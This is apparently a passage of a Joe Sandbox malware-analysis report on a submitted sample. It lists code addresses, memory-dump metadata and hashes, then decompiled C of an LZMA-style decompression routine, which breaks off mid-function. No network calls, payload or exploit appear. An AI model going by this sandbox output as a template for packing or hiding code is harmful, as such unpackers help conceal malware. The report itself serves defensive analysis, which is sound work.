                                                          0x00406e69
                                                          0x00406e71
                                                          0x00406e76
                                                          0x00406e78
                                                          0x00406e7a
                                                          0x00406e7a
                                                          0x00406e9c
                                                          0x00406ea3
                                                          0x00406ea6
                                                          0x00000000
                                                          0x00406eac
                                                          0x00000000
                                                          0x00406eac
                                                          0x00000000
                                                          0x00406eb1
                                                          0x00406eb1
                                                          0x00406eb5
                                                          0x00407575
                                                          0x00000000
                                                          0x00407575
                                                          0x00406ebb
                                                          0x00406ebe
                                                          0x00406ec1
                                                          0x00406ec5
                                                          0x00406ec8
                                                          0x00406ece
                                                          0x00406ed0
                                                          0x00406ed0
                                                          0x00406ed0
                                                          0x00406ed3
                                                          0x00406ed6
                                                          0x00406ed6
                                                          0x00406ed6
                                                          0x00406edc
                                                          0x00000000
                                                          0x00000000
                                                          0x00406ede
                                                          0x00406ee1
                                                          0x00406ee4
                                                          0x00406ee7
                                                          0x00406eea
                                                          0x00406eed
                                                          0x00406ef0
                                                          0x00406ef3
                                                          0x00406ef6
                                                          0x00406ef9
                                                          0x00406efc
                                                          0x00406f14
                                                          0x00406f17
                                                          0x00406f1a
                                                          0x00406f1d
                                                          0x00406f1d
                                                          0x00406f20
                                                          0x00406f24
                                                          0x00406f26
                                                          0x00406efe
                                                          0x00406efe
                                                          0x00406f06
                                                          0x00406f0b
                                                          0x00406f0d
                                                          0x00406f0f
                                                          0x00406f0f
                                                          0x00406f29
                                                          0x00406f30
                                                          0x00406f33
                                                          0x00000000
                                                          0x00406f35
                                                          0x00000000
                                                          0x00406f35
                                                          0x00406f33
                                                          0x00406f3a
                                                          0x00406f3a
                                                          0x00406f3a
                                                          0x00406f3a
                                                          0x00000000
                                                          0x00000000
                                                          0x00406f75
                                                          0x00406f75
                                                          0x00406f79
                                                          0x00407581
                                                          0x00000000
                                                          0x00407581
                                                          0x00406f7f
                                                          0x00406f82
                                                          0x00406f85
                                                          0x00406f89
                                                          0x00406f8c
                                                          0x00406f92
                                                          0x00406f94
                                                          0x00406f94
                                                          0x00406f94
                                                          0x00406f97
                                                          0x00406f9a
                                                          0x00406f9a
                                                          0x00406fa0
                                                          0x00406f3e
                                                          0x00406f3e
                                                          0x00406f41
                                                          0x00000000
                                                          0x00406f41
                                                          0x00406fa2
                                                          0x00406fa2
                                                          0x00406fa5
                                                          0x00406fa8
                                                          0x00406fab
                                                          0x00406fae
                                                          0x00406fb1
                                                          0x00406fb4
                                                          0x00406fb7
                                                          0x00406fba
                                                          0x00406fbd
                                                          0x00406fc0
                                                          0x00406fd8
                                                          0x00406fdb
                                                          0x00406fde
                                                          0x00406fe1
                                                          0x00406fe1
                                                          0x00406fe4
                                                          0x00406fe8
                                                          0x00406fea
                                                          0x00406fc2
                                                          0x00406fc2
                                                          0x00406fca
                                                          0x00406fcf
                                                          0x00406fd1
                                                          0x00406fd3
                                                          0x00406fd3
                                                          0x00406fed
                                                          0x00406ff4
                                                          0x00406ff7
                                                          0x00000000
                                                          0x00406ff9
                                                          0x00000000
                                                          0x00406ff9
                                                          0x00000000
                                                          0x00407286
                                                          0x00407286
                                                          0x0040728a
                                                          0x004075b1
                                                          0x00000000
                                                          0x004075b1
                                                          0x00407290
                                                          0x00407293
                                                          0x00407296
                                                          0x0040729a
                                                          0x0040729d
                                                          0x004072a3
                                                          0x004072a5
                                                          0x004072a5
                                                          0x004072a5
                                                          0x004072a8
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00407395
                                                          0x00407399
                                                          0x004073bb
                                                          0x004073be
                                                          0x004073c8
                                                          0x00000000
                                                          0x004073c8
                                                          0x0040739b
                                                          0x0040739e
                                                          0x004073a2
                                                          0x004073a5
                                                          0x004073a5
                                                          0x004073a8
                                                          0x00000000
                                                          0x00000000
                                                          0x00407452
                                                          0x00407456
                                                          0x00407474
                                                          0x00407474
                                                          0x00407474
                                                          0x0040747b
                                                          0x00407482
                                                          0x00407489
                                                          0x00407489
                                                          0x00000000
                                                          0x00407489
                                                          0x00407458
                                                          0x0040745b
                                                          0x0040745e
                                                          0x00407461
                                                          0x00407468
                                                          0x004073ac
                                                          0x004073ac
                                                          0x004073af
                                                          0x00000000
                                                          0x00000000
                                                          0x00407543
                                                          0x00407546
                                                          0x00000000
                                                          0x00000000
                                                          0x0040717d
                                                          0x0040717f
                                                          0x00407186
                                                          0x00407187
                                                          0x00407189
                                                          0x0040718c
                                                          0x00000000
                                                          0x00000000
                                                          0x00407194
                                                          0x00407197
                                                          0x0040719a
                                                          0x0040719c
                                                          0x0040719e
                                                          0x0040719e
                                                          0x0040719f
                                                          0x004071a2
                                                          0x004071a9
                                                          0x004071ac
                                                          0x004071ba
                                                          0x00000000
                                                          0x00000000
                                                          0x00407490
                                                          0x00407490
                                                          0x00407493
                                                          0x0040749a
                                                          0x00000000
                                                          0x00000000
                                                          0x0040749f
                                                          0x0040749f
                                                          0x004074a3
                                                          0x004075db
                                                          0x00000000
                                                          0x004075db
                                                          0x004074a9
                                                          0x004074ac
                                                          0x004074af
                                                          0x004074b3
                                                          0x004074b6
                                                          0x004074bc
                                                          0x004074be
                                                          0x004074be
                                                          0x004074be
                                                          0x004074c1
                                                          0x004074c4
                                                          0x004074c4
                                                          0x004074c4
                                                          0x004074c4
                                                          0x004074c7
                                                          0x004074c7
                                                          0x004074cb
                                                          0x0040752b
                                                          0x0040752e
                                                          0x00407533
                                                          0x00407534
                                                          0x00407536
                                                          0x00407538
                                                          0x0040753b
                                                          0x00000000
                                                          0x0040753b
                                                          0x004074cd
                                                          0x004074d3
                                                          0x004074d6
                                                          0x004074d9
                                                          0x004074dc
                                                          0x004074df
                                                          0x004074e2
                                                          0x004074e5
                                                          0x004074e8
                                                          0x004074eb
                                                          0x004074ee
                                                          0x00407507
                                                          0x0040750a
                                                          0x0040750d
                                                          0x00407510
                                                          0x00407514
                                                          0x00407516
                                                          0x00407516
                                                          0x00407517
                                                          0x0040751a
                                                          0x004074f0
                                                          0x004074f0
                                                          0x004074f8
                                                          0x004074fd
                                                          0x004074ff
                                                          0x00407502
                                                          0x00407502
                                                          0x0040751d
                                                          0x00407524
                                                          0x00000000
                                                          0x00407526
                                                          0x00000000
                                                          0x00407526
                                                          0x00000000
                                                          0x004071c2
                                                          0x004071c5
                                                          0x004071fb
                                                          0x0040732b
                                                          0x0040732b
                                                          0x0040732b
                                                          0x0040732b
                                                          0x0040732e
                                                          0x0040732e
                                                          0x00407331
                                                          0x00407333
                                                          0x004075bd
                                                          0x00000000
                                                          0x004075bd
                                                          0x00407339
                                                          0x0040733c
                                                          0x00000000
                                                          0x00000000
                                                          0x00407342
                                                          0x00407346
                                                          0x00407349
                                                          0x00407349
                                                          0x00407349
                                                          0x00000000
                                                          0x00407349
                                                          0x004071c7
                                                          0x004071c9
                                                          0x004071cb
                                                          0x004071cd
                                                          0x004071d0
                                                          0x004071d1
                                                          0x004071d3
                                                          0x004071d5
                                                          0x004071d8
                                                          0x004071db
                                                          0x004071f1
                                                          0x004071f6
                                                          0x0040722e
                                                          0x0040722e
                                                          0x00407232
                                                          0x0040725e
                                                          0x00407260
                                                          0x00407267
                                                          0x0040726a
                                                          0x0040726d
                                                          0x0040726d
                                                          0x00407272
                                                          0x00407272
                                                          0x00407274
                                                          0x00407277
                                                          0x0040727e
                                                          0x00407281
                                                          0x004072ae
                                                          0x004072ae
                                                          0x004072b1
                                                          0x004072b4
                                                          0x00407328
                                                          0x00407328
                                                          0x00407328
                                                          0x00000000
                                                          0x00407328
                                                          0x004072b6
                                                          0x004072bc
                                                          0x004072bf
                                                          0x004072c2
                                                          0x004072c5
                                                          0x004072c8
                                                          0x004072cb
                                                          0x004072ce
                                                          0x004072d1
                                                          0x004072d4
                                                          0x004072d7
                                                          0x004072f0
                                                          0x004072f2
                                                          0x004072f5
                                                          0x004072f6
                                                          0x004072f9
                                                          0x004072fb
                                                          0x004072fe
                                                          0x00407300
                                                          0x00407302
                                                          0x00407305
                                                          0x00407307
                                                          0x0040730a
                                                          0x0040730e
                                                          0x00407310
                                                          0x00407310
                                                          0x00407311
                                                          0x00407314
                                                          0x00407317
                                                          0x004072d9
                                                          0x004072d9
                                                          0x004072e1
                                                          0x004072e6
                                                          0x004072e8
                                                          0x004072eb
                                                          0x004072eb
                                                          0x0040731a
                                                          0x00407321
                                                          0x004072ab
                                                          0x004072ab
                                                          0x004072ab
                                                          0x004072ab
                                                          0x00000000
                                                          0x00407323
                                                          0x00000000
                                                          0x00407323
                                                          0x00407321
                                                          0x00407234
                                                          0x00407237
                                                          0x00407239
                                                          0x0040723c
                                                          0x0040723f
                                                          0x00407242
                                                          0x00407244
                                                          0x00407247
                                                          0x0040724a
                                                          0x0040724a
                                                          0x0040724d
                                                          0x0040724d
                                                          0x00407250
                                                          0x00407257
                                                          0x0040722b
                                                          0x0040722b
                                                          0x0040722b
                                                          0x0040722b
                                                          0x00000000
                                                          0x00407259
                                                          0x00000000
                                                          0x00407259
                                                          0x00407257
                                                          0x004071dd
                                                          0x004071e0
                                                          0x004071e2
                                                          0x004071e5
                                                          0x00000000
                                                          0x00000000
                                                          0x00406f44
                                                          0x00406f44
                                                          0x00406f48
                                                          0x0040758d
                                                          0x00000000
                                                          0x0040758d
                                                          0x00406f4e
                                                          0x00406f51
                                                          0x00406f54
                                                          0x00406f57
                                                          0x00406f5a
                                                          0x00406f5d
                                                          0x00406f60
                                                          0x00406f62
                                                          0x00406f65
                                                          0x00406f68
                                                          0x00406f6b
                                                          0x00406f6d
                                                          0x00406f6d
                                                          0x00406f6d
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x0040734c
                                                          0x0040734c
                                                          0x0040734c
                                                          0x00407350
                                                          0x00000000
                                                          0x00000000
                                                          0x00407356
                                                          0x00407359
                                                          0x0040735c
                                                          0x0040735f
                                                          0x00407361
                                                          0x00407361
                                                          0x00407361
                                                          0x00407364
                                                          0x00407367
                                                          0x0040736a
                                                          0x0040736d
                                                          0x00407370
                                                          0x00407373
                                                          0x00407374
                                                          0x00407376
                                                          0x00407376
                                                          0x00407376
                                                          0x00407379
                                                          0x0040737c
                                                          0x0040737f
                                                          0x00407382
                                                          0x00407385
                                                          0x00407389
                                                          0x0040738b
                                                          0x0040738e
                                                          0x00000000
                                                          0x00407390
                                                          0x00000000
                                                          0x00407390
                                                          0x0040738e
                                                          0x004075c3
                                                          0x00000000
                                                          0x00000000
                                                          0x00406bf2

                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.292638866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.292633849.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292664060.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292695326.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292705832.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292767334.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292786938.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292798492.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292806668.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292812000.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_xeWd55M5Lb.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 93c083d05bcdf6195ca23c2a54f1652f9efbc2f2339d63ff2f761c89645e7c92
                                                          • Instruction ID: 0a676f48c9952aad729ccf503b6a86ce95496029d8c73069f89f3073be052f6e
                                                          • Opcode Fuzzy Hash: 93c083d05bcdf6195ca23c2a54f1652f9efbc2f2339d63ff2f761c89645e7c92
                                                          • Instruction Fuzzy Hash: C3813471D08228DFDF24CFA8C8847ADBBB1FB44305F24816AD456BB281D778A986DF05
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 98%
                                                          			E00406BB0(void* __ecx) {
                                                          				void* _v8;
                                                          				void* _v12;
                                                          				signed int _v16;
                                                          				unsigned int _v20;
                                                          				signed int _v24;
                                                          				signed int _v28;
                                                          				signed int _v32;
                                                          				signed int _v36;
                                                          				signed int _v40;
                                                          				signed int _v44;
                                                          				signed int _v48;
                                                          				signed int _v52;
                                                          				signed int _v56;
                                                          				signed int _v60;
                                                          				signed int _v64;
                                                          				signed int _v68;
                                                          				signed int _v72;
                                                          				signed int _v76;
                                                          				signed int _v80;
                                                          				signed int _v84;
                                                          				signed int _v88;
                                                          				signed int _v92;
                                                          				signed int _v95;
                                                          				signed int _v96;
                                                          				signed int _v100;
                                                          				signed int _v104;
                                                          				signed int _v108;
                                                          				signed int _v112;
                                                          				signed int _v116;
                                                          				signed int _v120;
                                                          				intOrPtr _v124;
                                                          				signed int _v128;
                                                          				signed int _v132;
                                                          				signed int _v136;
                                                          				void _v140;
                                                          				void* _v148;
                                                          				signed int _t537;
                                                          				signed int _t538;
                                                          				signed int _t572;
                                                          
                                                          				_t572 = 0x22;
                                                          				_v148 = __ecx;
                                                          				memcpy( &_v140, __ecx, _t572 << 2);
                                                          				if(_v52 == 0xffffffff) {
                                                          					return 1;
                                                          				}
                                                          				while(1) {
                                                          					L3:
                                                          					_t537 = _v140;
                                                          					if(_t537 > 0x1c) {
                                                          						break;
                                                          					}
                                                          					switch( *((intOrPtr*)(_t537 * 4 +  &M00407602))) {
                                                          						case 0:
                                                          							__eflags = _v112;
                                                          							if(_v112 == 0) {
                                                          								goto L173;
                                                          							}
                                                          							_v112 = _v112 - 1;
                                                          							_v116 = _v116 + 1;
                                                          							_t537 =  *_v116;
                                                          							__eflags = _t537 - 0xe1;
                                                          							if(_t537 > 0xe1) {
                                                          								goto L174;
                                                          							}
                                                          							_t542 = _t537 & 0x000000ff;
                                                          							_push(0x2d);
                                                          							asm("cdq");
                                                          							_pop(_t576);
                                                          							_push(9);
                                                          							_pop(_t577);
                                                          							_t622 = _t542 / _t576;
                                                          							_t544 = _t542 % _t576 & 0x000000ff;
                                                          							asm("cdq");
                                                          							_t617 = _t544 % _t577 & 0x000000ff;
                                                          							_v64 = _t617;
                                                          							_v32 = (1 << _t622) - 1;
                                                          							_v28 = (1 << _t544 / _t577) - 1;
                                                          							_t625 = (0x300 << _t617 + _t622) + 0x736;
                                                          							__eflags = 0x600 - _v124;
                                                          							if(0x600 == _v124) {
                                                          								L12:
                                                          								__eflags = _t625;
                                                          								if(_t625 == 0) {
                                                          									L14:
                                                          									_v76 = _v76 & 0x00000000;
                                                          									_v68 = _v68 & 0x00000000;
                                                          									goto L17;
                                                          								} else {
                                                          									goto L13;
                                                          								}
                                                          								do {
                                                          									L13:
                                                          									_t625 = _t625 - 1;
                                                          									__eflags = _t625;
                                                          									 *((short*)(_v8 + _t625 * 2)) = 0x400;
                                                          								} while (_t625 != 0);
                                                          								goto L14;
                                                          							}
                                                          							__eflags = _v8;
                                                          							if(_v8 != 0) {
                                                          								GlobalFree(_v8);
                                                          							}
                                                          							_t537 = GlobalAlloc(0x40, 0x600); // executed
                                                          							__eflags = _t537;
                                                          							_v8 = _t537;
                                                          							if(_t537 == 0) {
                                                          								goto L174;
                                                          							} else {
                                                          								_v124 = 0x600;
                                                          								goto L12;
                                                          							}
                                                          						case 1:
                                                          							L15:
                                                          							__eflags = _v112;
                                                          							if(_v112 == 0) {
                                                          								_v140 = 1;
                                                          								goto L173;
                                                          							}
                                                          							_v112 = _v112 - 1;
                                                          							_v68 = _v68 | ( *_v116 & 0x000000ff) << _v76 << 0x00000003;
                                                          							_v116 = _v116 + 1;
                                                          							_t50 =  &_v76;
                                                          							 *_t50 = _v76 + 1;
                                                          							__eflags =  *_t50;
                                                          							L17:
                                                          							__eflags = _v76 - 4;
                                                          							if(_v76 < 4) {
                                                          								goto L15;
                                                          							}
                                                          							_t550 = _v68;
                                                          							__eflags = _t550 - _v120;
                                                          							if(_t550 == _v120) {
                                                          								L22:
                                                          								_v76 = 5;
                                                          								 *(_v12 + _v120 - 1) =  *(_v12 + _v120 - 1) & 0x00000000;
                                                          								goto L25;
                                                          							}
                                                          							__eflags = _v12;
                                                          							_v120 = _t550;
                                                          							if(_v12 != 0) {
                                                          								GlobalFree(_v12);
                                                          							}
                                                          							_t537 = GlobalAlloc(0x40, _v68); // executed
                                                          							__eflags = _t537;
                                                          							_v12 = _t537;
                                                          							if(_t537 == 0) {
                                                          								goto L174;
                                                          							} else {
                                                          								goto L22;
                                                          							}
                                                          						case 2:
                                                          							L26:
                                                          							_t557 = _v100 & _v32;
                                                          							_v136 = 6;
                                                          							_v80 = _t557;
                                                          							_t626 = _v8 + ((_v60 << 4) + _t557) * 2;
                                                          							goto L135;
                                                          						case 3:
                                                          							L23:
                                                          							__eflags = _v112;
                                                          							if(_v112 == 0) {
                                                          								_v140 = 3;
                                                          								goto L173;
                                                          							}
                                                          							_v112 = _v112 - 1;
                                                          							_t72 =  &_v116;
                                                          							 *_t72 = _v116 + 1;
                                                          							__eflags =  *_t72;
                                                          							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                          							L25:
                                                          							_v76 = _v76 - 1;
                                                          							__eflags = _v76;
                                                          							if(_v76 != 0) {
                                                          								goto L23;
                                                          							}
                                                          							goto L26;
                                                          						case 4:
                                                          							L136:
                                                          							_t559 =  *_t626;
                                                          							_t610 = _t559 & 0x0000ffff;
                                                          							_t591 = (_v20 >> 0xb) * _t610;
                                                          							__eflags = _v16 - _t591;
                                                          							if(_v16 >= _t591) {
                                                          								_v20 = _v20 - _t591;
                                                          								_v16 = _v16 - _t591;
                                                          								_v68 = 1;
                                                          								_t560 = _t559 - (_t559 >> 5);
                                                          								__eflags = _t560;
                                                          								 *_t626 = _t560;
                                                          							} else {
                                                          								_v20 = _t591;
                                                          								_v68 = _v68 & 0x00000000;
                                                          								 *_t626 = (0x800 - _t610 >> 5) + _t559;
                                                          							}
                                                          							__eflags = _v20 - 0x1000000;
                                                          							if(_v20 >= 0x1000000) {
                                                          								goto L142;
                                                          							} else {
                                                          								goto L140;
                                                          							}
                                                          						case 5:
                                                          							L140:
                                                          							__eflags = _v112;
                                                          							if(_v112 == 0) {
                                                          								_v140 = 5;
                                                          								goto L173;
                                                          							}
                                                          							_v20 = _v20 << 8;
                                                          							_v112 = _v112 - 1;
                                                          							_t464 =  &_v116;
                                                          							 *_t464 = _v116 + 1;
                                                          							__eflags =  *_t464;
                                                          							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                          							L142:
                                                          							_t561 = _v136;
                                                          							goto L143;
                                                          						case 6:
                                                          							__edx = 0;
                                                          							__eflags = _v68;
                                                          							if(_v68 != 0) {
                                                          								__eax = _v8;
                                                          								__ecx = _v60;
                                                          								_v56 = 1;
                                                          								_v136 = 7;
                                                          								__esi = _v8 + 0x180 + _v60 * 2;
                                                          								goto L135;
                                                          							}
                                                          							__eax = _v96 & 0x000000ff;
                                                          							__esi = _v100;
                                                          							__cl = 8;
                                                          							__cl = 8 - _v64;
                                                          							__esi = _v100 & _v28;
                                                          							__eax = (_v96 & 0x000000ff) >> 8;
                                                          							__ecx = _v64;
                                                          							__esi = (_v100 & _v28) << 8;
                                                          							__ecx = _v8;
                                                          							((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2;
                                                          							__eax = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9;
                                                          							__eflags = _v60 - 4;
                                                          							__eax = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
                                                          							_v92 = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
                                                          							if(_v60 >= 4) {
                                                          								__eflags = _v60 - 0xa;
                                                          								if(_v60 >= 0xa) {
                                                          									_t103 =  &_v60;
                                                          									 *_t103 = _v60 - 6;
                                                          									__eflags =  *_t103;
                                                          								} else {
                                                          									_v60 = _v60 - 3;
                                                          								}
                                                          							} else {
                                                          								_v60 = 0;
                                                          							}
                                                          							__eflags = _v56 - __edx;
                                                          							if(_v56 == __edx) {
                                                          								__ebx = 0;
                                                          								__ebx = 1;
                                                          								goto L63;
                                                          							}
                                                          							__eax = _v24;
                                                          							__eax = _v24 - _v48;
                                                          							__eflags = __eax - _v120;
                                                          							if(__eax >= _v120) {
                                                          								__eax = __eax + _v120;
                                                          								__eflags = __eax;
                                                          							}
                                                          							__ecx = _v12;
                                                          							__ebx = 0;
                                                          							__ebx = 1;
                                                          							__al =  *((intOrPtr*)(__eax + __ecx));
                                                          							_v95 =  *((intOrPtr*)(__eax + __ecx));
                                                          							goto L43;
                                                          						case 7:
                                                          							__eflags = _v68 - 1;
                                                          							if(_v68 != 1) {
                                                          								__eax = _v40;
                                                          								_v132 = 0x16;
                                                          								_v36 = _v40;
                                                          								__eax = _v44;
                                                          								_v40 = _v44;
                                                          								__eax = _v48;
                                                          								_v44 = _v48;
                                                          								__eax = 0;
                                                          								__eflags = _v60 - 7;
                                                          								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                          								__al = __al & 0x000000fd;
                                                          								__eax = (__eflags >= 0) - 1 + 0xa;
                                                          								_v60 = (__eflags >= 0) - 1 + 0xa;
                                                          								__eax = _v8;
                                                          								__eax = _v8 + 0x664;
                                                          								__eflags = __eax;
                                                          								_v92 = __eax;
                                                          								goto L71;
                                                          							}
                                                          							__eax = _v8;
                                                          							__ecx = _v60;
                                                          							_v136 = 8;
                                                          							__esi = _v8 + 0x198 + _v60 * 2;
                                                          							goto L135;
                                                          						case 8:
                                                          							__eflags = _v68;
                                                          							if(_v68 != 0) {
                                                          								__eax = _v8;
                                                          								__ecx = _v60;
                                                          								_v136 = 0xa;
                                                          								__esi = _v8 + 0x1b0 + _v60 * 2;
                                                          							} else {
                                                          								__eax = _v60;
                                                          								__ecx = _v8;
                                                          								__eax = _v60 + 0xf;
                                                          								_v136 = 9;
                                                          								_v60 + 0xf << 4 = (_v60 + 0xf << 4) + _v80;
                                                          								__esi = _v8 + ((_v60 + 0xf << 4) + _v80) * 2;
                                                          							}
                                                          							goto L135;
                                                          						case 9:
                                                          							__eflags = _v68;
                                                          							if(_v68 != 0) {
                                                          								goto L92;
                                                          							}
                                                          							__eflags = _v100;
                                                          							if(_v100 == 0) {
                                                          								goto L174;
                                                          							}
                                                          							__eax = 0;
                                                          							__eflags = _v60 - 7;
                                                          							_t264 = _v60 - 7 >= 0;
                                                          							__eflags = _t264;
                                                          							0 | _t264 = _t264 + _t264 + 9;
                                                          							_v60 = _t264 + _t264 + 9;
                                                          							goto L78;
                                                          						case 0xa:
                                                          							__eflags = _v68;
                                                          							if(_v68 != 0) {
                                                          								__eax = _v8;
                                                          								__ecx = _v60;
                                                          								_v136 = 0xb;
                                                          								__esi = _v8 + 0x1c8 + _v60 * 2;
                                                          								goto L135;
                                                          							}
                                                          							__eax = _v44;
                                                          							goto L91;
                                                          						case 0xb:
                                                          							__eflags = _v68;
                                                          							if(_v68 != 0) {
                                                          								__ecx = _v40;
                                                          								__eax = _v36;
                                                          								_v36 = _v40;
                                                          							} else {
                                                          								__eax = _v40;
                                                          							}
                                                          							__ecx = _v44;
                                                          							_v40 = _v44;
                                                          							L91:
                                                          							__ecx = _v48;
                                                          							_v48 = __eax;
                                                          							_v44 = _v48;
                                                          							L92:
                                                          							__eax = _v8;
                                                          							_v132 = 0x15;
                                                          							__eax = _v8 + 0xa68;
                                                          							_v92 = _v8 + 0xa68;
                                                          							goto L71;
                                                          						case 0xc:
                                                          							L102:
                                                          							__eflags = _v112;
                                                          							if(_v112 == 0) {
                                                          								_v140 = 0xc;
                                                          								goto L173;
                                                          							}
                                                          							__ecx = _v116;
                                                          							__eax = _v16;
                                                          							_v20 = _v20 << 8;
                                                          							__ecx =  *_v116 & 0x000000ff;
                                                          							_v112 = _v112 - 1;
                                                          							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                          							_t340 =  &_v116;
                                                          							 *_t340 = _v116 + 1;
                                                          							__eflags =  *_t340;
                                                          							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                          							__eax = _v48;
                                                          							goto L104;
                                                          						case 0xd:
                                                          							L39:
                                                          							__eflags = _v112;
                                                          							if(_v112 == 0) {
                                                          								_v140 = 0xd;
                                                          								goto L173;
                                                          							}
                                                          							__ecx = _v116;
                                                          							__eax = _v16;
                                                          							_v20 = _v20 << 8;
                                                          							__ecx =  *_v116 & 0x000000ff;
                                                          							_v112 = _v112 - 1;
                                                          							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                          							_t127 =  &_v116;
                                                          							 *_t127 = _v116 + 1;
                                                          							__eflags =  *_t127;
                                                          							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                          							L41:
                                                          							__eax = _v68;
                                                          							__eflags = _v76 - _v68;
                                                          							if(_v76 != _v68) {
                                                          								goto L50;
                                                          							}
                                                          							__eflags = __ebx - 0x100;
                                                          							if(__ebx >= 0x100) {
                                                          								goto L56;
                                                          							}
                                                          							L43:
                                                          							__eax = _v95 & 0x000000ff;
                                                          							_v95 = _v95 << 1;
                                                          							__ecx = _v92;
                                                          							__eax = (_v95 & 0x000000ff) >> 7;
                                                          							_v76 = __eax;
                                                          							__eax = __eax + 1;
                                                          							__eax = __eax << 8;
                                                          							__eax = __eax + __ebx;
                                                          							__esi = _v92 + __eax * 2;
                                                          							_v20 = _v20 >> 0xb;
                                                          							__ax =  *__esi;
                                                          							_v88 = __esi;
                                                          							__edx = __ax & 0x0000ffff;
                                                          							__ecx = (_v20 >> 0xb) * __edx;
                                                          							__eflags = _v16 - __ecx;
                                                          							if(_v16 >= __ecx) {
                                                          								_v20 = _v20 - __ecx;
                                                          								_v16 = _v16 - __ecx;
                                                          								__cx = __ax;
                                                          								_v68 = 1;
                                                          								__cx = __ax >> 5;
                                                          								__eflags = __eax;
                                                          								__ebx = __ebx + __ebx + 1;
                                                          								 *__esi = __ax;
                                                          							} else {
                                                          								_v68 = _v68 & 0x00000000;
                                                          								_v20 = __ecx;
                                                          								0x800 = 0x800 - __edx;
                                                          								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                          								__ebx = __ebx + __ebx;
                                                          								 *__esi = __cx;
                                                          							}
                                                          							__eflags = _v20 - 0x1000000;
                                                          							_v72 = __ebx;
                                                          							if(_v20 >= 0x1000000) {
                                                          								goto L41;
                                                          							} else {
                                                          								goto L39;
                                                          							}
                                                          						case 0xe:
                                                          							L48:
                                                          							__eflags = _v112;
                                                          							if(_v112 == 0) {
                                                          								_v140 = 0xe;
                                                          								goto L173;
                                                          							}
                                                          							__ecx = _v116;
                                                          							__eax = _v16;
                                                          							_v20 = _v20 << 8;
                                                          							__ecx =  *_v116 & 0x000000ff;
                                                          							_v112 = _v112 - 1;
                                                          							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                          							_t161 =  &_v116;
                                                          							 *_t161 = _v116 + 1;
                                                          							__eflags =  *_t161;
                                                          							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                          							while(1) {
                                                          								L50:
                                                          								__eflags = __ebx - 0x100;
                                                          								if(__ebx >= 0x100) {
                                                          									break;
                                                          								}
                                                          								__eax = _v92;
                                                          								__edx = __ebx + __ebx;
                                                          								__ecx = _v20;
                                                          								__esi = __edx + __eax;
                                                          								__ecx = _v20 >> 0xb;
                                                          								__ax =  *__esi;
                                                          								_v88 = __esi;
                                                          								__edi = __ax & 0x0000ffff;
                                                          								__ecx = (_v20 >> 0xb) * __edi;
                                                          								__eflags = _v16 - __ecx;
                                                          								if(_v16 >= __ecx) {
                                                          									_v20 = _v20 - __ecx;
                                                          									_v16 = _v16 - __ecx;
                                                          									__cx = __ax;
                                                          									_t175 = __edx + 1; // 0x1
                                                          									__ebx = _t175;
                                                          									__cx = __ax >> 5;
                                                          									__eflags = __eax;
                                                          									 *__esi = __ax;
                                                          								} else {
                                                          									_v20 = __ecx;
                                                          									0x800 = 0x800 - __edi;
                                                          									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                          									__ebx = __ebx + __ebx;
                                                          									 *__esi = __cx;
                                                          								}
                                                          								__eflags = _v20 - 0x1000000;
                                                          								_v72 = __ebx;
                                                          								if(_v20 >= 0x1000000) {
                                                          									continue;
                                                          								} else {
                                                          									goto L48;
                                                          								}
                                                          							}
                                                          							L56:
                                                          							_t178 =  &_v56;
                                                          							 *_t178 = _v56 & 0x00000000;
                                                          							__eflags =  *_t178;
                                                          							goto L57;
                                                          						case 0xf:
                                                          							L60:
                                                          							__eflags = _v112;
                                                          							if(_v112 == 0) {
                                                          								_v140 = 0xf;
                                                          								goto L173;
                                                          							}
                                                          							__ecx = _v116;
                                                          							__eax = _v16;
